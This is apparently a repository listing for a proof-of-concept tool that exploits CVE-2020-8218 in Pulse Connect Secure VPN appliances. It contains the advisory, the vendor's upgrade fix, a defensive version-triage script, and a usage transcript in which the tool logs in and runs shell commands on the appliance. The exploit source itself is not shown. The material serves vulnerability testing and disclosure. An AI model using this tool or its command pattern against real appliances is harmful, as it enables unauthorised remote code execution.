CVE-2020-8218 PoC — Pulse Secure Pulse Connect Secure Code Injection Vulnerability

Source
Associated Vulnerability
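Title: Pulse Secure Pulse Connect Secure Code Injection Vulnerability (CVE-2020-8218)
Description: Pulse Secure Pulse Connect Secure (also known as PCS, formerly Juniper Junos Pulse) is an SSL VPN solution from the US company Pulse Secure. A code injection vulnerability exists in Pulse Secure PCS versions before 9.1RB. An attacker can exploit this vulnerability with a specially crafted URI to execute arbitrary code.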
Description
Tool to test for existence of CVE-2020-8218
Readme
# pulse-gosecure-rce

```
          _____                    _____                    _____            _____                    _____          
         /\    \                  /\    \                  /\    \          /\    \                  /\    \         
        /::\    \                /::\____\                /::\____\        /::\    \                /::\    \        
       /::::\    \              /:::/    /               /:::/    /       /::::\    \              /::::\    \       
      /::::::\    \            /:::/    /               /:::/    /       /::::::\    \            /::::::\    \      
     /:::/\:::\    \          /:::/    /               /:::/    /       /:::/\:::\    \          /:::/\:::\    \     
    /:::/__\:::\    \        /:::/    /               /:::/    /       /:::/__\:::\    \        /:::/__\:::\    \    
   /::::\   \:::\    \      /:::/    /               /:::/    /        \:::\   \:::\    \      /::::\   \:::\    \   
  /::::::\   \:::\    \    /:::/    /      _____    /:::/    /       ___\:::\   \:::\    \    /::::::\   \:::\    \  
 /:::/\:::\   \:::\____\  /:::/____/      /\    \  /:::/    /       /\   \:::\   \:::\    \  /:::/\:::\   \:::\    \ 
/:::/  \:::\   \:::|    ||:::|    /      /::\____\/:::/____/       /::\   \:::\   \:::\____\/:::/__\:::\   \:::\____\
\::/    \:::\  /:::|____||:::|____\     /:::/    /\:::\    \       \:::\   \:::\   \::/    /\:::\   \:::\   \::/    /
 \/_____/\:::\/:::/    /  \:::\    \   /:::/    /  \:::\    \       \:::\   \:::\   \/____/  \:::\   \:::\   \/____/ 
          \::::::/    /    \:::\    \ /:::/    /    \:::\    \       \:::\   \:::\    \       \:::\   \:::\    \     
           \::::/    /      \:::\    /:::/    /      \:::\    \       \:::\   \:::\____\       \:::\   \:::\____\    
            \::/____/        \:::\__/:::/    /        \:::\    \       \:::\  /:::/    /        \:::\   \::/    /    
             ~~               \::::::::/    /          \:::\    \       \:::\/:::/    /          \:::\   \/____/     
                               \::::::/    /            \:::\    \       \::::::/    /            \:::\    \         
                                \::::/    /              \:::\____\       \::::/    /              \:::\____\        
                                 \::/____/                \::/    /        \::/    /                \::/    /        
                                  ~~                       \/____/          \/____/                  \/____/         
```

## About
Proof of concept tool to test for the existence of Pulse Secure RCE (CVE-2020-8218) and to encourage further research. This tool was built around the POC from the GoSecure advisory. All credit to them for the finding. 

## Recommended Fix
As recommended by Pulse Secure:
***"The solution for these vulnerabilities is to upgrade the Pulse Connect Secure and Pulse Policy Secure server software version to the 9.1R8. This following PCS/PPS version can be downloaded from https://my.pulsesecure.net."***
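To act on that recommendation across more than one appliance, the following added example (not part of the original tool or README) sorts an inventory of reported versions into those below 9.1R8, those at or above it, and those that cannot be parsed. It assumes version strings of the form `<major>.<minor>R<release>[.<patch>]`; the hostnames and versions in `SAMPLE` are constructed.

```python
import re

# Fixed release named in the vendor quote above: 9.1R8.
FIXED = (9, 1, 8, 0)

# Assumed version layout: <major>.<minor>R<release>[.<patch>], e.g. "9.1R7.1".
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)R(\d+)(?:\.(\d+))?\s*$", re.IGNORECASE)


def parse_version(text):
    """Return (major, minor, release, patch), or None if the string does not match."""
    m = _VERSION_RE.match(text)
    if not m:
        return None
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def needs_upgrade(text):
    """True if below 9.1R8, False if at or above it, None if unparseable."""
    version = parse_version(text)
    if version is None:
        return None
    return version < FIXED


def triage(inventory):
    """Split a {host: version} mapping into upgrade / ok / unknown host lists."""
    result = {"upgrade": [], "ok": [], "unknown": []}
    for host, version in sorted(inventory.items()):
        verdict = needs_upgrade(version)
        # An unparseable version is never counted as safe; it gets its own bucket.
        key = "unknown" if verdict is None else ("upgrade" if verdict else "ok")
        result[key].append(host)
    return result


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE = {
    "vpn-a.example.internal": "9.1R7",
    "vpn-b.example.internal": "9.1R8",
    "vpn-c.example.internal": "9.0R3.4",
    "vpn-d.example.internal": "9.1R8.2",
    "vpn-e.example.internal": "unknown build",
}

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Hosts in the `unknown` bucket need a manual version check before they can be treated as patched.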

## References
* https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44516/?kA23Z000000L6i5SAC
* https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/

## Usage
Example usage:
```
withdk@hogwarts source % python pulse-gosecure-rce.py -u https://192.168.1.120 --user admin --password mypassword
[*] Successfully logged in
(Cmd) ls /
[*] Sending cmd ls /
[*] Sending exploit...
[*] Getting output...
******************************************
2.6.32.358-x86_64
bin
boot
cgroups
data
dev
etc
home
lib
lib64
modules
opt
pkg
proc
runtime
sbin
sys
tmp
usr
va
var
webserver

******************************************
(Cmd) exit
Bye
[*] Getting logout URL
[*] Sending logout URL
[*] Successfully logged out.
```

DK @withdk  
September 2020

## Disclaimer
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
File Snapshot

```
[4.0K] /data/pocs/8b1a8a5e6f440483eeda2a20466028b1d9e20645
├── [ 34K] LICENSE
├── [8.8K] pulse-gosecure-rce.py
├── [4.3K] README.md
└── [ 34] requirements.txt

0 directories, 4 files
```